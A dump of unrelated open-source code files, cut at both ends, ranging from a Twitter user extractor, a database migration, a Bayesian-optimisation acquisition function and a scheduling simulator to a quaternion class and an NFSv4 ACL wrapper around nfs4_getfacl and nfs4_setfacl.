file_save = open(path_save_to + file_save_to,'wb')
file_writer = csv.writer(file_save)
print file_name_list
file_index = 0
for file_name in file_name_list:
file_index = file_index + 1
file = open(path_data + file_name, 'r')
write_log(log_file_name='find_verified_user.log',log_file_path=os.getcwd(),information='file index:' + str(file_index) + ' is being processing.')
for line in file:
try:
print len(line)
row = json.loads(line,object_pairs_hook=OrderedDict)
actor = [row['actor']['id'], row['actor']['verified'], row['actor']['preferredUsername']]
file_writer.writerow(actor)
print 'file index:', file_index, actor
if row['type'] == 'retweet':
origin_actor = [row['originActor']['id'], row['originActor']['verified'], row['originActor']['preferredUsername']]
file_writer.writerow(origin_actor)
else:
pass
except:
print file_index, '*' * 100
pass
file.close()
file_save.close()
def drop_duplicate_user(path_data,path_save_to, actor_file,all_user_file,verified_user_file):
user_dataFrame = pd.read_csv(path_data + actor_file,names = ['user_id','isverified','preferred_username'],dtype={'user_id':np.str},header=None)
user_dataFrame = user_dataFrame.drop_duplicates()
user_verified_dataFrame = user_dataFrame[user_dataFrame.isverified == True]
user_dataFrame.to_csv(path_save_to + all_user_file,index = False,header=False)
user_verified_dataFrame.to_csv(path_save_to + verified_user_file,index=False,header=False)
print 'all user:\n',user_dataFrame
print 'verified user:\n',user_verified_dataFrame
def main():
write_log(log_file_name='find_verified_user.log', log_file_path=os.getcwd(),
information='###################program start#####################.')
path_data = 'D:/LiuQL/eHealth/twitter/data/data_origin/'
path_save_to = 'D:/LiuQL/eHealth/twitter/data/data_origin/'
# path_data = '/pegasus/twitter-p-or-t-uae-201603.json.dxb/'
# path_save_to ='/pegasus/harir/Qianlong/data/network/'
duplicate_user_file = 'user_contain_duplicates.txt'
all_user_file = 'user_all.txt'
verified_user_file = 'user_verified.txt'
find_user(path_data = path_data, path_save_to = path_save_to,file_save_to=duplicate_user_file)
drop_duplicate_user(path_data = path_save_to, path_save_to = path_save_to, actor_file=duplicate_user_file,all_user_file=all_user_file,verified_user_file=verified_user_file)
write_log(log_file_name='find_verified_user.log', log_file_path=os.getcwd(),
information='###################program finished#####################.' + '\n' * 5)
main()
| 3,318 |
migrations/versions/7263a24da5fd_.py
|
originaltebas/chmembers
| 0 |
2170892
|
"""empty message
Revision ID: 7263a24da5fd
Revises: <KEY>
Create Date: 2019-06-06 16:11:22.957093
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '7263a24da5fd'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('miembros', 'hoja_firmada',
existing_type=mysql.TINYINT(display_width=1),
type_=sa.Boolean(),
existing_nullable=True)
op.add_column('reuniones', sa.Column('comentarios_culto', sa.String(length=100), nullable=True))
op.drop_column('reuniones', 'comentarios')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('reuniones', sa.Column('comentarios', mysql.VARCHAR(length=100), nullable=True))
op.drop_column('reuniones', 'comentarios_culto')
op.alter_column('miembros', 'hoja_firmada',
existing_type=sa.Boolean(),
type_=mysql.TINYINT(display_width=1),
existing_nullable=True)
# ### end Alembic commands ###
| 1,224 |
enbo/util/two_step_ei_envelope.py
|
shalijiang/bo
| 3 |
2169905
|
import torch
from botorch.models.model import Model
from botorch.acquisition.analytic import (
ExpectedImprovement,
AnalyticAcquisitionFunction,
)
from botorch.acquisition.monte_carlo import qExpectedImprovement
from torch import Tensor
from botorch.optim import optimize_acqf
from botorch.optim.initializers import gen_batch_initial_conditions
from botorch.gen import gen_candidates_torch
from botorch.sampling.samplers import (
MCSampler,
GaussHermiteSampler,
SobolQMCNormalSampler,
)
from typing import Union, Optional, Dict
from botorch.utils.transforms import t_batch_mode_transform
from botorch.acquisition import ScalarizedObjective
from botorch.acquisition.two_step_ei import qExpectedImprovementBatch
from botorch import settings
from botorch.utils.sampling import draw_sobol_samples
class TwoStepEIEnvelope(AnalyticAcquisitionFunction):
def __init__(
self,
model: Model,
best_f: Union[float, Tensor],
bounds: Tensor,
sampler: Optional[MCSampler] = None,
inner_sampler: Optional[MCSampler] = None,
q1: Optional[int] = 1,
options: Optional[Dict[str, Union[bool, float, int, str]]] = {},
objective: Optional[ScalarizedObjective] = None,
maximize: bool = True,
) -> None:
r"""Two-step Expected Improvement based on:
Wu & Frazier, Practical Two-Step Lookahead Bayesian Optimization, NeurIPS 2019.
Args:
model: A fitted single-outcome model.
best_f: Either a scalar or a `b`-dim Tensor (batch mode) representing
the best function value observed so far (assumed noiseless).
bounds: a 2 x d tensor specifying the range of each dimension
sampler: used to sample y from its posterior
q1: int, batch size of the second step
objective: A ScalarizedObjective (optional).
maximize: If True, consider the problem a maximization problem.
"""
super().__init__(model=model, objective=objective)
self.maximize = maximize
if not torch.is_tensor(best_f):
best_f = torch.tensor(best_f)
self.register_buffer("best_f", best_f)
self.bounds = bounds
self.sampler = sampler
self.inner_sampler = inner_sampler or SobolQMCNormalSampler(num_samples=512)
self.q1 = q1
self.options = options
@t_batch_mode_transform(expected_q=1)
def forward(self, X: Tensor) -> Tensor:
r"""Evaluate Two-Step EI on the candidate set X.
Args:
X: A `b1 x ... bk x 1 x d`-dim batched tensor of `d`-dim design points.
Expected Improvement is computed for each point individually,
i.e., what is considered are the marginal posteriors, not the
joint.
Returns:
A `b1 x ... bk`-dim tensor of Expected Improvement values at the
given design points `X`.
"""
acq_func = ExpectedImprovement(model=self.model, best_f=self.best_f)
immediate_utility = acq_func(X)
if self.q1 == 0:
return immediate_utility
if X.dim() < 3:
X = X.unsqueeze(0)
batch_size, q, d = X.shape
fantasy_model = self.model.fantasize(
X=X, sampler=self.sampler, observation_noise=True
)
best_f = fantasy_model.train_targets.max(dim=-1)[0]
# assume _sample_shape=torch.Size([num_samples])
num_fantasies = self.sampler.sample_shape[0]
with torch.enable_grad():
if self.q1 == 1: # two-step, use analytic EI
value_function = ExpectedImprovement(model=fantasy_model, best_f=best_f)
else:
value_function = qExpectedImprovement(
model=fantasy_model, sampler=self.inner_sampler, best_f=best_f
)
def joint_value_function(X):
# X reshape to batch_shape x fantasies x batch_size x q x d
batch_size_joint = X.shape[0]
X_prime = X.view(
batch_size_joint, num_fantasies, batch_size, self.q1, d
)
# values: batch_size_joint x num_fantasies x batch_size
values = value_function(X_prime)
return values.sum(tuple(range(1, len(values.shape))))
joint_optim_size = num_fantasies * batch_size * self.q1
# can tune num_restarts, raw_samples, and maxiter to tradeoff efficiency and accuracy
num_restarts = 20
seed = self.options.get("seed", 0)
method = self.options.get("method", "scipy")
if method == "scipy": # by default L-BFGS-B is used
num_batches = self.options.get("num_batches", 5)
X_fantasies, _ = optimize_acqf(
acq_function=joint_value_function,
bounds=self.bounds,
q=joint_optim_size,
num_restarts=num_restarts,
raw_samples=512,
options={
"maxiter": 500,
"seed": seed,
"batch_limit": round(num_restarts / num_batches),
},
)
elif method == "torch" or method == "sgd": # by default Adam is used
bounds = self.bounds
Xinit = gen_batch_initial_conditions(
acq_function=joint_value_function,
bounds=bounds,
q=joint_optim_size,
num_restarts=50,
raw_samples=1000,
options={
"nonnegative": True,
"seed": self.options.get("seed", None),
},
)
# Xinit = draw_sobol_samples(bounds=bounds, n=100, q=joint_optim_size, seed=self.options.get("seed", None))
optimizer = torch.optim.SGD if method == "sgd" else torch.optim.Adam
batch_candidates, batch_acq_values = gen_candidates_torch(
initial_conditions=Xinit,
acquisition_function=joint_value_function,
lower_bounds=bounds[0],
upper_bounds=bounds[1],
optimizer=optimizer,
options={
"maxiter": 500,
"lr": 1.0,
"scheduler_on": True,
"gamma": 0.7,
},
# options={"maxiter": 300},
verbose=False,
)
best = torch.argmax(batch_acq_values.view(-1), dim=0)
X_fantasies = batch_candidates[best].detach()
X_fantasies = X_fantasies.view(num_fantasies, batch_size, self.q1, d)
with settings.propagate_grads(True):
values = value_function(X_fantasies)
if isinstance(self.sampler, GaussHermiteSampler):
weighted_values = values * self.sampler.base_weights
future_utility = torch.sum(weighted_values, dim=0)
else:
future_utility = values.mean(dim=0)
return immediate_utility + future_utility
| 7,281 |
ELDAmwl/backscatter/common/calibration/params.py
|
actris-scc/ELDAmwl
| 1 |
2167849
|
from addict import Dict
from ELDAmwl.bases.base import Params
from ELDAmwl.component.interface import IDBFunc
from ELDAmwl.output.mwl_file_structure import MWLFileStructure
from ELDAmwl.output.mwl_file_structure import MWLFileVarsFromDB
from zope.component import queryUtility
class BscCalibrationParams(Params):
def __init__(self):
super(BscCalibrationParams, self).__init__()
self.cal_range_search_algorithm = None
self.WindowWidth = None
self.cal_value = None
self.cal_interval = Dict({'min_height': None,
'max_height': None})
@classmethod
def from_db(cls, general_params):
result = cls()
db_func = queryUtility(IDBFunc)
query = db_func.get_bsc_cal_params_query(general_params.prod_id, general_params.product_type)
result.cal_range_search_algorithm = \
query.BscCalibrOption.calRangeSearchMethod_ID
result.window_width = \
float(query.BscCalibrOption.WindowWidth)
result.cal_value = \
float(query.BscCalibrOption.calValue)
result.cal_interval['min_height'] = \
float(query.BscCalibrOption.LowestHeight)
result.cal_interval['max_height'] = \
float(query.BscCalibrOption.TopHeight)
return result
def equal(self, other):
result = True
if (self.cal_interval.min_height != other.cal_interval.min_height) or \
(self.cal_interval.max_height != other.cal_interval.max_height) or \
(self.window_width != other.window_width) or \
(self.cal_value != other.cal_value) or \
(self.cal_range_search_algorithm != other.cal_range_search_algorithm):
result = False
return result
def to_meta_ds_dict(self, dct):
"""
writes parameter content into Dict for further export in mwl file
Args:
dct (addict.Dict): is a dict which will be converted into dataset.
has the keys 'attrs' and 'data_vars'
Returns:
"""
mwl_struct = MWLFileStructure()
mwl_vars = MWLFileVarsFromDB()
dct.data_vars.calibration_range_search_algorithm = \
mwl_vars.bsc_calibr_method_var(self.cal_range_search_algorithm)
dct.data_vars.calibration_search_range = mwl_struct.cal_search_range_var(self.cal_interval)
dct.data_vars.calibration_value = mwl_struct.bsc_calibr_value_var(self.cal_value)
| 2,512 |
machine-learning/solution/ml-classifiers-own.py
|
giserh/book-python
| 1 |
2168324
|
from sklearn import metrics
from scipy.spatial.distance import euclidean as euclidean_distance
from sklearn.model_selection import train_test_split
from sklearn import datasets
class NearestNeighborClassifier:
def fit(self, features, labels):
self.features_train = features
self.labels_train = labels
def predict(self, features_test):
predictions = []
for row in features_test:
label = self._closest(row)
predictions.append(label)
return predictions
def _closest(self, row):
current_best_dist = euclidean_distance(row, self.features_train[0])
best_index = 0
for i in range(0, len(self.features_train)):
dist = euclidean_distance(row, self.features_train[i])
if dist < current_best_dist:
current_best_dist = dist
best_index = i
return self.labels_train[best_index]
dataset = datasets.load_iris()
features = dataset.data
labels = dataset.target
data = train_test_split(features, labels, test_size=0.25, random_state=0)
features_train = data[0]
features_test = data[1]
labels_train = data[2]
labels_test = data[3]
model = NearestNeighborClassifier()
model.fit(features_train, labels_train)
predictions = model.predict(features_test)
accuracy = metrics.accuracy_score(labels_test, predictions)
print(accuracy)
| 1,384 |
worker/notification/task/update_push_result.py
|
pjongy/jraze
| 5 |
2168886
|
import deserialize
from common.logger.logger import get_logger
from common.structure.job.messaging import DevicePlatform
from common.structure.job.notification import NotificationSentResultMessageArgs
from worker.notification.external.jraze.jraze import JrazeApi
from worker.notification.task import AbstractTask
logger = get_logger(__name__)
class UpdatePushResultTask(AbstractTask):
def __init__(self, jraze_api: JrazeApi):
self.jraze_api: JrazeApi = jraze_api
async def run(self, kwargs: dict):
task_args: NotificationSentResultMessageArgs = deserialize.deserialize(
NotificationSentResultMessageArgs, kwargs)
if task_args.device_platform == DevicePlatform.IOS:
await self.jraze_api.increase_notification_sent(
notification_uuid=task_args.notification_uuid,
ios=task_args.sent,
)
elif task_args.device_platform == DevicePlatform.Android:
await self.jraze_api.increase_notification_sent(
notification_uuid=task_args.notification_uuid,
android=task_args.sent,
)
| 1,133 |
lab6/simulator.py
|
aostrun/RTC-Demos
| 0 |
2169552
|
import sys
from task import Task, Scheduler
from schedulers import *
# Constants
RMPA_STR = 'RMPA'
EDF_STR = 'EDF'
LLF_STR = 'LLF'
SCHED_STR = 'SCHED'
OPCE_STR = 'OPCE'
if(len(sys.argv) <= 1):
print("Please provide input file!")
exit(1)
elif(len(sys.argv) > 2):
print("Too many arguments provided!")
exit(1)
filename = sys.argv[1]
# Read lines from input file
with open(filename, 'r') as file:
lines = file.readlines()
# There has to be at least 2 lines in the input file
if(len(lines) < 2):
print("Invalid file...")
exit(1)
# Split the first line and check simulator metadata
#print(lines[0].split(' '))
info_split = lines[0].split()
# Parse task data from input file
tasks = list()
for i in range(1, len(lines)):
#print(lines[i])
if info_split[0] == OPCE_STR:
task_split = lines[i].split(' ')
task_id = int(task_split[0])
task_duration = int(task_split[1])
task = Task(task_id, 10000, task_duration)
task.next_start = 100000
new_list = list()
for k in range(2, len(task_split)):
new_list.append(int(task_split[k]))
task.wait = new_list
else:
task_split = lines[i].split(' ')
task_period = int(task_split[0])
task_duration = int(task_split[1])
if info_split[0] == SCHED_STR:
task_prio = int(task_split[2])
task_sched_type = task_split[3].rstrip()
task = Task(i, task_period, task_duration, task_prio, task_sched_type)
if task_sched_type == "RR":
task.rr_remaining = int(info_split[2])
task.rr_period = task.rr_remaining
else:
task = Task(i, task_period, task_duration)
tasks.append(task)
#print(task_period.__str__() + ":" + task_duration.__str__())
scheduler = Scheduler(tasks)
if info_split[0] == LLF_STR or info_split[0] == SCHED_STR:
task_period = int(info_split[2])
scheduler.period = task_period
#
if(info_split[0] == RMPA_STR):
print("RMPA Mode")
rmpa_duration = int(info_split[1])
# Run RMPA simulation
rmpa(rmpa_duration, scheduler)
elif(info_split[0] == EDF_STR):
print("EDF Mode")
edf_duration = int(info_split[1])
# Run EDF simulation
edf(edf_duration, scheduler)
elif(info_split[0] == LLF_STR):
print("LLF Mode")
llf_duration = int(info_split[1])
llf_period = int(info_split[2])
# Run LLF simulation
llf(llf_duration, llf_period, scheduler)
elif(info_split[0] == SCHED_STR):
print("SCHED Mode")
# Run SCHED simulation
sched_duration = int(info_split[1])
sched_period = int(info_split[2])
# Run LLF simulation
sched(sched_duration, sched_period, scheduler)
elif(info_split[0] == OPCE_STR):
opce(160, scheduler)
"""
for task in tasks:
print(task)
for w in task.wait:
print(w)
"""
else:
print("Mode not supported!")
exit(1)
print("Simulation Done!\n")
| 2,974 |
Cadastro de Produtos/clientes/forms/pedido_forms.py
|
Drack112/Treina-Web-Django
| 0 |
2170722
|
from django import forms
from ..models import Pedido, Cliente, Produto
class PedidoForm(forms.ModelForm):
cliente = forms.ModelChoiceField(queryset=Cliente.objects.all())
produtos = forms.ModelMultipleChoiceField(queryset=Produto.objects.all())
class Meta:
model = Pedido
fields = [
"cliente",
"observacoes",
"data_pedido",
"valor",
"status",
"produtos",
]
| 468 |
rdl/column_transformers/StringTransformers.py
|
pageuppeople-opensource/relational-data-loader
| 2 |
2170553
|
class ToUpper:
@staticmethod
def execute(text_in):
x = text_in.upper()
return x
class TrimWhiteSpace:
@staticmethod
def execute(text_in):
return text_in.strip()
| 203 |
scripts/measure_dir.py
|
HReynaud/Morpho-MNIST
| 0 |
2167009
|
import argparse
import multiprocessing
import os
from morphomnist import io, measure
def measure_dir(data_dir, pool):
for name in ['t10k', 'train']:
in_path = os.path.join(data_dir, name + "-images-idx3-ubyte.gz")
out_path = os.path.join(data_dir, name + "-morpho.csv")
print(f"Processing MNIST data file {in_path}...")
data = io.load_idx(in_path)
df = measure.measure_batch(data, pool=pool, chunksize=100)
df.to_csv(out_path, index_label='index')
print(f"Morphometrics saved to {out_path}")
def main(data_dirs):
with multiprocessing.Pool() as pool:
for data_dir in data_dirs:
measure_dir(data_dir, pool)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Morpho-MNIST - Measure an image directory")
parser.add_argument('datadirs', nargs='+',
help="one or more MNIST image directories to measure")
args = parser.parse_args()
print(args.datadirs)
assert all(os.path.exists(data_dir) for data_dir in args.datadirs)
main(args.datadirs)
| 1,096 |
quaternion/quat.py
|
IhorNehrutsa/micropython-samples
| 268 |
2168504
|
# quat.py "Micro" Quaternion class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2020 <NAME>
from math import sqrt, sin, cos, acos, isclose, asin, atan2, pi
from array import array
mdelta = 0.001 # 0.1% Minimum difference considered significant for graphics
adelta = 0.001 # Absolute tolerance for components near 0
def _arglen(arg):
length = 0
try:
length = len(arg)
except TypeError:
pass
if length not in (0, 3, 4):
raise ValueError('Sequence length must be 3 or 4')
return length
# Convert a rotation quaternion to Euler angles. Beware:
# https://github.com/moble/quaternion/wiki/Euler-angles-are-horrible
def euler(q): # Return (heading, pitch, roll)
if not q.isrot():
raise ValueError('Must be a rotation quaternion.')
w, x, y, z = q
pitch = asin(2*(w*y - x*z))
if isclose(pitch, pi/2, rel_tol = mdelta):
return -2 * atan2(x, w), pitch, 0
if isclose(pitch, -pi/2, rel_tol = mdelta):
return 2 * atan2(x, w), pitch, 0
roll = atan2(2*(w*x + y*z), w*w - x*x - y*y + z*z)
#roll = atan2(2*(w*x + y*z), 1 - 2*(x*x + y*y))
hdg = atan2(2*(w*z + x*y), w*w + x*x - y*y - z*z)
#hdg = atan2(2*(w*z + x*y), 1 - 2 *(y*y + z*z))
return hdg, pitch, roll
class Quaternion:
def __init__(self, w=1, x=0, y=0, z=0): # Default: the identity quaternion
self.d = array('f', (w, x, y, z))
@property
def w(self):
return self[0]
@w.setter
def w(self, v):
self[0] = v
@property
def x(self):
return self[1]
@x.setter
def x(self, v):
self[1] = v
@property
def y(self):
return self[2]
@y.setter
def y(self, v):
self[2] = v
@property
def z(self):
return self[3]
@z.setter
def z(self, v):
self[3] = v
def normalise(self):
if self[0] == 1: # acos(1) == 0. Identity quaternion: no rotation
return Quaternion(1, 0, 0, 0)
m = abs(self) # Magnitude
assert m > 0.1 # rotation quaternion should have magnitude ~= 1
if isclose(m, 1.0, rel_tol=mdelta):
return self # No normalisation necessary
return Quaternion(*(a/m for a in self))
def __getitem__(self, key):
return self.d[key]
def __setitem__(self, key, v):
try:
v1 = array('f', v)
except TypeError: # Scalar
v1 = v
self.d[key] = v1
def copy(self):
return Quaternion(*self)
def __abs__(self): # Return magnitude
return sqrt(sum((d*d for d in self)))
def __len__(self):
return 4
# Comparison: == and != perform equality test of all elements
def __eq__(self, other):
return all((isclose(a, b, rel_tol=mdelta, abs_tol=adelta) for a, b in zip(self, other)))
def __ne__(self, other):
return not self == other
# < and > comparisons compare magnitudes.
def __gt__(self, other):
return abs(self) > abs(other)
def __lt__(self, other):
return abs(self) < abs(other)
# <= and >= return True for complete equality otherwise magnitudes are compared.
def __ge__(self, other):
return True if self == other else abs(self) > abs(other)
def __le__(self, other):
return True if self == other else abs(self) < abs(other)
def to_angle_axis(self):
q = self.normalise()
if isclose(q[0], 1.0, rel_tol = mdelta):
return 0, 1, 0, 0
theta = 2*acos(q[0])
s = sin(theta/2)
return [theta] + [a/s for a in q[1:]]
def conjugate(self):
return Quaternion(self[0], *(-a for a in self[1:]))
def inverse(self): # Reciprocal
return self.conjugate()/sum((d*d for d in self))
def __str__(self):
return 'w = {:4.2f} x = {:4.2f} y = {:4.2f} z = {:4.2f}'.format(*self)
def __pos__(self):
return Quaternion(*self)
def __neg__(self):
return Quaternion(*(-a for a in self))
def __truediv__(self, scalar):
if isinstance(scalar, Quaternion): # See docs for reason
raise ValueError('Cannot divide by Quaternion')
return Quaternion(*(a/scalar for a in self))
def __rtruediv__(self, other):
return self.inverse() * other
# Multiply by quaternion, list, tuple, or scalar: result = self * other
def __mul__(self, other):
if isinstance(other, Quaternion):
w1, x1, y1, z1 = self
w2, x2, y2, z2 = other
w = w1*w2 - x1*x2 - y1*y2 - z1*z2
x = w1*x2 + x1*w2 + y1*z2 - z1*y2
y = w1*y2 - x1*z2 + y1*w2 + z1*x2
z = w1*z2 + x1*y2 - y1*x2 + z1*w2
return Quaternion(w, x, y, z)
length = _arglen(other)
if length == 0: # Assume other is scalar
return Quaternion(*(a * other for a in self))
elif length == 3:
return Quaternion(0, *(a * b for a, b in zip(self[1:], other)))
# length == 4:
return Quaternion(*(a * b for a, b in zip(self, other)))
def __rmul__(self, other):
return self * other # Multiplication by scalars and tuples is commutative
def __add__(self, other):
if isinstance(other, Quaternion):
return Quaternion(*(a + b for a, b in zip(self, other)))
length = _arglen(other)
if length == 0: # Assume other is scalar
return Quaternion(self[0] + other, *self[1:]) # ? Is adding a scalar meaningful?
elif length == 3:
return Quaternion(0, *(a + b for a, b in zip(self[1:], other)))
# length == 4:
return Quaternion(*(a + b for a, b in zip(self, other)))
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if isinstance(other, Quaternion):
return Quaternion(*(a - b for a, b in zip(self, other)))
length = _arglen(other)
if length == 0: # Assume other is scalar
return Quaternion(self[0] - other, *self[1:]) # ? Is this meaningful?
elif length == 3:
return Quaternion(0, *(a - b for a, b in zip(self[1:], other)))
# length == 4:
return Quaternion(*(a - b for a, b in zip(self, other)))
def __rsub__(self, other):
return other + self.__neg__() # via __radd__
def isrot(self):
return isclose(abs(self), 1.0, rel_tol = mdelta)
def isvec(self):
return isclose(self[0], 0, abs_tol = adelta)
def __matmul__(self, rot):
return rot * self * rot.conjugate()
def rrot(self, rot):
return rot.conjugate() * self * rot
# A vector quaternion has real part 0. It can represent a point in space.
def Vector(x, y, z):
return Quaternion(0, x, y, z)
Point = Vector
# A rotation quaternion is a unit quaternion i.e. magnitude == 1
def Rotator(theta=0, x=0, y=0, z=0):
s = sin(theta/2)
m = sqrt(x*x + y*y + z*z) # Convert to unit vector
if m > 0:
return Quaternion(cos(theta/2), s*x/m, s*y/m, s*z/m)
else:
return Quaternion(1, 0, 0, 0) # Identity quaternion
def Euler(heading, pitch, roll):
cy = cos(heading * 0.5);
sy = sin(heading * 0.5);
cp = cos(pitch * 0.5);
sp = sin(pitch * 0.5);
cr = cos(roll * 0.5);
sr = sin(roll * 0.5);
w = cr * cp * cy + sr * sp * sy;
x = sr * cp * cy - cr * sp * sy;
y = cr * sp * cy + sr * cp * sy;
z = cr * cp * sy - sr * sp * cy;
return Quaternion(w, x, y, z) # Tait-Bryan angles but z == towards sky
| 7,557 |
GUItest.py
|
migzpogi/PokerCalculator
| 4 |
2170595
|
from flask import Flask, render_template, request
app = Flask(__name__)
app.debug = True
@app.route('/', methods=['GET'])
def dropdown():
colours = ['Red', 'Blue', 'Black', 'Orange']
return render_template('test.html', colours=colours)
if __name__ == "__main__":
app.run()
| 287 |
shared/qpg_defaults.py
|
byu-imaal/dns-cookies-pam21
| 0 |
2170281
|
"""Default QnameComponent extensions that are included in the base QueryParserGenerator class"""
import base64
import binascii
import random
import socket
import string
import struct
import time
from shared.qpg_component_base import QnameComponent
class QnameKeyword(QnameComponent):
id = "$key"
exceptions = []
@classmethod
def generate(cls, val) -> str:
return str(val)
class QnameIP(QnameComponent):
id = "$ip"
exceptions = [socket.error, binascii.Error, OSError]
@classmethod
def generate(cls, ip_addr):
if ':' in ip_addr:
return base64.b32encode(socket.inet_pton(socket.AF_INET6, ip_addr))[:-6].lower().decode()
else:
return base64.b32encode(socket.inet_pton(socket.AF_INET, ip_addr))[:-1].lower().decode()
@classmethod
def parse(cls, label):
if len(label) > 7:
return socket.inet_ntop(socket.AF_INET6, base64.b32decode('{}======'.format(label).upper()))
else:
return socket.inet_ntop(socket.AF_INET, base64.b32decode('{}='.format(label).upper()))
class QnameTimestamp(QnameComponent):
id = "$ts"
exceptions = [binascii.Error, struct.error]
@classmethod
def generate(cls, timestamp: float = None) -> str:
if timestamp is None:
timestamp = time.time()
return base64.b32encode(struct.pack(">I", int(timestamp)))[:-1].lower().decode()
@classmethod
def parse(cls, label: str) -> int:
return struct.unpack('>I', base64.b32decode(label + '=', casefold=True))[0]
class QnameMicroSeconds(QnameComponent):
id = "$tsu"
exceptions = []
@classmethod
def generate(cls, timestamp: float = None) -> str:
if timestamp is None:
timestamp = time.time()
return str(int(10000000 * (timestamp - int(timestamp))))
@classmethod
def parse(cls, label: str) -> int:
return int(label)
class QnameHostname(QnameComponent):
id = "$host"
exceptions = [socket.error]
@classmethod
def generate(cls) -> str:
return socket.gethostname()
class QnameUnique(QnameComponent):
"""
This class is NOT thread-safe.
If multithreading is needed, pre-generate the qnames serially
"""
id = "$uniq"
exceptions = []
__num = 0
@classmethod
def generate(cls) -> str:
cls.__num += 1
return str(cls.__num)
class QnameRandomAlpha(QnameComponent):
id = "$randalpha"
exceptions = []
@classmethod
def generate(cls, length: int = 8) -> str:
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
class QnameRandomNumeric(QnameComponent):
id = "$randnum"
exceptions = []
@classmethod
def generate(cls, length: int = 8) -> str:
return ''.join(random.choice(string.digits) for _ in range(length))
class QnameRandomAlphaNumeric(QnameComponent):
id = "$randalphanum"
exceptions = []
ascii_lower_digits = string.ascii_lowercase + string.digits
@classmethod
def generate(cls, length: int = 8) -> str:
return ''.join(random.choice(cls.ascii_lower_digits) for _ in range(length))
class QnameRandomBase32(QnameComponent):
id = "$randb32"
exceptions = []
@classmethod
def generate(cls, timestamp: float = None) -> str:
if timestamp is None:
timestamp = time.time()
timestamp = int(timestamp * 100000)
b32 = base64.b32encode(struct.pack('>Q', timestamp)).decode().lower()
slc = slice(0, b32.index('='))
b32 = b32[slc]
return ''.join(random.sample(b32, len(b32)))
| 3,632 |
src/nfs4_share/acl.py
|
AlexJanse/network-filesystem-shares
| 0 |
2169545
|
import os
import re
import pwd
import grp
import subprocess
import logging
# Basic paths to binaries
getfacl_bin = "/usr/bin/nfs4_getfacl"
setfacl_bin = "/usr/bin/nfs4_setfacl"
def assert_command_exists(command_path):
assert os.path.isfile(command_path) and os.access(command_path, os.X_OK), "Reading the nfs4 access-control list " \
"requires the executable binary '%s'" % \
command_path
class AccessControlList:
"""
Representation of an NFSv4 ACL (LIST)
"""
def __init__(self, entries):
if type(entries) not in [set, list]:
raise TypeError("Entries should be a set or list")
self.entries = entries
def __repr__(self):
return ",".join([repr(i) for i in self.entries])
def __eq__(self, other):
return self.entries == other.entries
def __iter__(self):
return iter(self.entries)
def __sub__(self, other): # self - other
first_index, last_index = find_sub_list(other.entries, self.entries)
if first_index is None: # No sublist was found
return self
new_acl = AccessControlList(self.entries[:first_index]+self.entries[last_index+1:])
return new_acl
def __add__(self, other):
new_acl = AccessControlList(self.entries + other.entries)
return new_acl
@classmethod
def from_file(cls, filename):
"""Calls the nfs4_getfacl binaries via CLI to get ACEs"""
global getfacl_bin
assert_command_exists(getfacl_bin)
try:
output = subprocess.check_output([getfacl_bin, filename], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
logging.error(e.cmd)
logging.error(e.stdout.decode())
logging.error(e.stderr.decode())
raise e
entries = []
for line in nonblank_lines(output.decode().split("\n")):
if line.startswith('#'):
continue
entry = AccessControlEntity.from_string(line, filename=filename)
entries.append(entry)
if len(entries) == 0:
raise OSError("Could not get ACLs from file \'%s\'" % filename)
return cls(entries)
def append(self, *args, **kwargs):
self._change_nfs4('-a', *args, **kwargs)
def set(self, *args, **kwargs):
self._change_nfs4('-s', *args, **kwargs)
def unset(self, *args, **kwargs):
self._change_nfs4('-x', *args, **kwargs)
def _change_nfs4(self, action, target, recursive=False, test=False):
"""
Calls the nfs4_setfacl binaries via CLI to change permissions
"""
logging.debug("Changing permissions (%s) on %s (recursive=%s)" % (action, target, recursive))
global setfacl_bin
assert_command_exists(setfacl_bin)
command = [setfacl_bin]
if recursive:
command.append('-R')
if test:
command.append('--test')
command.append(action)
command.extend([repr(self), target])
try:
subprocess.check_output(command, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
logging.error("Subprocess: %s" % e.cmd)
logging.error("Subprocess: %s" % e.output.decode())
raise e
class AccessControlEntity:
"""
Representation of an NFSv4 ACE (Entity)
"""
ace_spec = "{entry_type}:{flags}:{identity}@{domain}:{permissions}"
def __init__(self, entry_type, flags, identity, domain, permissions):
self.entry_type = entry_type
self.flags = flags
self.identity = identity
self.domain = domain
self.permissions = permissions
def __repr__(self):
return self.ace_spec.format(
entry_type=self.entry_type,
flags=self.flags,
identity=self.identity,
domain=self.domain,
permissions=self.permissions)
def __str__(self):
return repr(self)
def __eq__(self, other):
if self.entry_type != other.entry_type \
or self.flags != other.flags \
or self.domain != other.domain \
or self.identity != other.identity:
return False
if len(self.permissions) != len(other.permissions):
return False
for perm in self.permissions:
if perm not in other.permissions:
return False
return True
@property
def permissions(self):
return self._permissions
@permissions.setter
def permissions(self, value):
for letter in value:
if letter in ['R', 'W', 'X']:
raise NotImplementedError("Upper-case permissions are not allowed (%s) [R->rtncy, W->waDtTNcCy, "
"X->xtcy]" % value)
self._permissions = value
@classmethod
def from_string(cls, string, filename=None):
"""
Returns a AccessControlEntity tat is based on a string.
A filename is required if one wants to translate special principal
"""
components = string.split(':')
entry_type = components[0]
flags = components[1]
principal = components[2]
if principal in ['OWNER@', 'GROUP@', 'EVERYONE@']:
assert filename is not None, "filename is required to make a special principal translation!"
identity, domain, flags = cls.translate_special_principals(principal, filename, flags)
else:
split = principal.split('@')
identity = split[0]
domain = split[1]
permissions = components[3]
return cls(entry_type, flags, identity, domain, permissions)
@staticmethod
def translate_special_principals(principal, filename, flags):
"""
Translates a special principal to the actual user / group name. NFS4 share domain is taken from /etc/idmapd.conf and falls back on `dnsdomainname`.
Returns identity, domain and flags"""
domain = get_nfs4_domain()
stat_info = os.stat(filename)
if 'OWNER@' == principal:
uid = stat_info.st_uid
user = pwd.getpwuid(uid)[0]
return user, domain, flags
elif 'GROUP@' == principal:
gid = stat_info.st_gid
group = grp.getgrgid(gid)[0]
flags = flags+'g'
return group, domain, flags
